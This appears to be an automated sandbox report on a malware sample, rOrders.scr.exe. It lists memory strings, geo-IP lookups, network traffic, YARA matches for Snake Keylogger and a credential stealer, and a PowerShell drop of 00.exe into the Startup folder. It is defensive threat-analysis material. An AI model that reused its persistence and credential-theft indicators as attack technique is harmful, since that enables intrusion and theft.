Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.2092923724.000000000617A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2225810987.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2219165054.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2227771780.000000000793D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000002.00000002.2089846660.0000000005111000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2219165054.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2219165054.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2227771780.000000000793D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2096916551.0000000007C63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000002.00000002.2089846660.0000000005111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2219165054.0000000004F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBsq
Source: powershell.exe, 00000007.00000002.2225810987.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2225810987.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2225810987.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000005.00000003.2088950532.000002A0CFCC0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000007.00000002.2219165054.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2227771780.000000000793D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2092923724.000000000617A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2225810987.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: rOrders.scr.exe, 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.rOrders.scr.exe.3c99840.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.00.exe.42c8570.2.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.rOrders.scr.exe.2ed8d64.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.rOrders.scr.exe.3c99840.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rOrders.scr.exe.3c99840.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rOrders.scr.exe.3c99840.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 6.2.00.exe.35b6fb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.rOrders.scr.exe.2ed6524.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 6.2.00.exe.35b97f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: rOrders.scr.exe PID: 1848, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rOrders.scr.exe PID: 1848, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: rOrders.scr.exe PID: 4760, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rOrders.scr.exe PID: 4760, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: rOrders.scr.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_0115D304	0_2_0115D304
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_051665B0	0_2_051665B0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_0516B358	0_2_0516B358
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_05160006	0_2_05160006
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_05160040	0_2_05160040
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_07A7E3A0	0_2_07A7E3A0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_07A71C80	0_2_07A71C80
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_07A72B88	0_2_07A72B88
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5B328	4_2_02B5B328
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5F007	4_2_02B5F007
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5C190	4_2_02B5C190
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B56108	4_2_02B56108
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5C753	4_2_02B5C753
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5C470	4_2_02B5C470
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B54AD9	4_2_02B54AD9
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5CA33	4_2_02B5CA33
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5BBD3	4_2_02B5BBD3
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B56880	4_2_02B56880
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B59858	4_2_02B59858
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5BEB0	4_2_02B5BEB0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5B4F3	4_2_02B5B4F3
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5E528	4_2_02B5E528
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B5E517	4_2_02B5E517
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B53573	4_2_02B53573
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CB6E8	4_2_069CB6E8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C8608	4_2_069C8608
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CD670	4_2_069CD670
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CA408	4_2_069CA408
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CBD38	4_2_069CBD38
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C0D48	4_2_069C0D48
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CAA58	4_2_069CAA58
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CC388	4_2_069CC388
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C8BF2	4_2_069C8BF2
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CB0A0	4_2_069CB0A0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CD028	4_2_069CD028
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C11A0	4_2_069C11A0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CC9D8	4_2_069CC9D8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C5EB8	4_2_069C5EB8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CB6D9	4_2_069CB6D9
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C5EC8	4_2_069C5EC8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C5618	4_2_069C5618
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C560B	4_2_069C560B
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CD661	4_2_069CD661
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C3730	4_2_069C3730
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C6778	4_2_069C6778
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C676B	4_2_069C676B
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C0498	4_2_069C0498
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C7497	4_2_069C7497
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C0488	4_2_069C0488
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C74A8	4_2_069C74A8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C4430	4_2_069C4430
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C85F8	4_2_069C85F8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C0D39	4_2_069C0D39
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CBD28	4_2_069CBD28
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C7D58	4_2_069C7D58
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C7D48	4_2_069C7D48
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CAA48	4_2_069CAA48
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C5A70	4_2_069C5A70
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C5A60	4_2_069C5A60
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C33B8	4_2_069C33B8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C33A8	4_2_069C33A8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C6BD0	4_2_069C6BD0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C6BC1	4_2_069C6BC1
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CA3F8	4_2_069CA3F8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C6313	4_2_069C6313
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C6320	4_2_069C6320
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CC378	4_2_069CC378
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CB08F	4_2_069CB08F
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C08F0	4_2_069C08F0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C78F0	4_2_069C78F0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C08E0	4_2_069C08E0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C2818	4_2_069C2818
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CD018	4_2_069CD018
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C0006	4_2_069C0006
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C2807	4_2_069C2807
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C7050	4_2_069C7050
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C704B	4_2_069C704B
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C0040	4_2_069C0040
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C5198	4_2_069C5198
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C518B	4_2_069C518B
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C81B0	4_2_069C81B0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C81A0	4_2_069C81A0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069CC9C8	4_2_069CC9C8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_069C7900	4_2_069C7900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 6_2_030FD304	6_2_030FD304
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014B6108	9_2_014B6108
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014BF007	9_2_014BF007
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014BB328	9_2_014BB328
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014BC470	9_2_014BC470
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014BC751	9_2_014BC751
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014B6880	9_2_014B6880
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014BBBD3	9_2_014BBBD3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014BCA31	9_2_014BCA31
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014B4AD9	9_2_014B4AD9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014BBEB0	9_2_014BBEB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014B3570	9_2_014B3570
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014BE528	9_2_014BE528
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014BE527	9_2_014BE527
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014BB4F3	9_2_014BB4F3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F04A0	9_2_069F04A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F8460	9_2_069F8460
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F7D90	9_2_069F7D90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F0040	9_2_069F0040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F3870	9_2_069F3870
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F11C0	9_2_069F11C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FCEF8	9_2_069FCEF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FCEEA	9_2_069FCEEA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FF610	9_2_069FF610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FF600	9_2_069FF600
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FC638	9_2_069FC638
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FC648	9_2_069FC648
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FD798	9_2_069FD798
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FD7A8	9_2_069FD7A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F0490	9_2_069F0490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FE4B0	9_2_069FE4B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FE4A0	9_2_069FE4A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FB4E8	9_2_069FB4E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FB4E7	9_2_069FB4E7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FDC00	9_2_069FDC00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FBD98	9_2_069FBD98
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F7D8F	9_2_069F7D8F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FBD88	9_2_069FBD88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F0D5F	9_2_069F0D5F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FED50	9_2_069FED50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F0D60	9_2_069F0D60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FED60	9_2_069FED60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FCA9F	9_2_069FCA9F
